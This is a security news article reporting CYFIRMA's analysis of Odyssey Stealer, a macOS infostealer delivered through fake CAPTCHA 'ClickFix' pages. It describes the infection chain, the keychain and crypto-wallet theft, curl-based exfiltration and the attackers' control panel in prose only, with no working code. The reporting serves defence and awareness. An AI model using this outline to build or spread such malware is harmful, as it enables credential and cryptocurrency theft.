A new player has emerged in the macOS malware ecosystem—Odyssey Stealer—leveraging clever social engineering and targeting cryptocurrency users across the Western world. In its latest threat intelligence report, the CYFIRMA research team exposes how this stealthy infostealer weaponizes fake App Store prompts and typosquatted domains to infiltrate systems and exfiltrate highly sensitive data.
According to CYFIRMA:
“The CYFIRMA research team has uncovered multiple websites employing Clickfix tactics to deliver malicious AppleScripts (osascripts)… designed to steal browser cookies, passwords, cryptocurrency wallet data, and browser plugins.”
These malicious sites masquerade as Apple App Store or financial service platforms. Users are tricked into running terminal commands copied from these phony CAPTCHA pages—unknowingly unleashing malware on their own machines.
The ClickFix technique is a form of social engineering:
- The victim lands on a typosquatted or spoofed domain.
- They are shown a fake Cloudflare CAPTCHA.
- macOS users are asked to paste a Base64-encoded AppleScript into their terminal.
- This script fetches a payload from a remote command-and-control server.
“Upon execution, the malware displays a fake prompt designed to capture the user’s password… [then] copies macOS keychain files… to a temporary folder /tmp/lovemrtrump.”
The malware can steal from wallet apps like Electrum, Coinomi, Exodus, and browser extensions like MetaMask, harvesting private keys and session tokens across Chrome, Firefox, Safari, and Chromium-based browsers.
Odyssey Stealer is a full-spectrum infostealer. Among its capabilities:
- Keychain credentials and user-entered passwords.
- Cryptocurrency wallet files and seed phrases.
- Login data, payment info, and cookies for session hijacking.
- Documents and images with extensions like .txt, .pdf, .docx, .jpg, .kdbx.
The stolen data is zipped into out.zip and exfiltrated via a curl POST request—retrying silently up to 10 times if the connection fails.
Behind the scenes, attackers use a web-based command-and-control panel:
“The panel provides a structured interface for attackers to manage stolen data, configure malware behavior, and deploy attacks.”
Features include dashboards, malware builders, bot listings, and a “Google Cookies Restore” function—used to hijack live sessions from stolen browser data. Most panels identified were hosted in Russia.
Odyssey Stealer is a descendant of AMOS Stealer, inheriting much of its codebase. According to CYFIRMA:
“Odyssey Stealer represents the latest evolution in macOS-targeting malware, emerging as a rebranded version of Poseidon Stealer which itself originated as a fork of the AMOS Stealer.”
Evidence from dark web forums suggests “Rodrigo,” the original AMOS author, is actively involved in Odyssey’s development—positioning it as a direct competitor to its predecessor in the macOS malware-as-a-service (MaaS) market.
Odyssey Stealer exemplifies the growing sophistication of macOS-targeted threats. Its use of convincing fake websites, real-time credential validation, and professional-grade infrastructure underlines the shift of macOS malware from novelty to serious cybercrime tool.
